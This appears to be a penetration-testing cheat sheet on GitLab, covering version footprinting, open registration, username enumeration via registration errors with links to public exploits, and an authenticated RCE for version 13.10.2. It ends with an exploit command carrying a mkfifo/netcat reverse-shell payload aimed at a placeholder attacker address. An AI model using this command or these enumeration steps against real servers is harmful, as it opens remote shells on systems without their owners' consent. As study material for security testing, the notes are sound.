# Gitlab

## **Introduction**

> * GitLab is an open source end-to-end software development platform with built-in version control, issue tracking, code review, CI/CD, and more.
> * There's not much we can do against GitLab without knowing the version number or being logged in.
> * In some cases, you can register a user accoun without admin confirmation

***

## **GitLab Footprinting & Enumeration**

* There's not much we can do against GitLab without knowing the version number or being logged in.
* The only way to footprint the GitLab `version number` in use is by browsing to the `/help` page when logged in.
* Some GitLab istances may `allow user registration` without confirmation from an administrator
* Authenticated: browsing to `/explore` we can check for any `public projects` that may contain something interesting

***

## **GitLab User Enumeration**

* We can enumerate valid (used) usernames by using the registration form error messages
* Resources (PoCs for enumerating users):
  * <https://www.exploit-db.com/exploits/49821>
  * <https://github.com/dpgg101/GitLabUserEnum>

***

## **GitLab Authenticated RCE**

* **Affected version:** `13.10.2`
* **Exploit:** <https://www.exploit-db.com/exploits/49951>
* **PoC Usage:**\
  `python3 gitlab_13_10_2_rce.py -t http://gitlab.test.example:8081 -u user -p password -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc your-ip your-nc-port >/tmp/f '`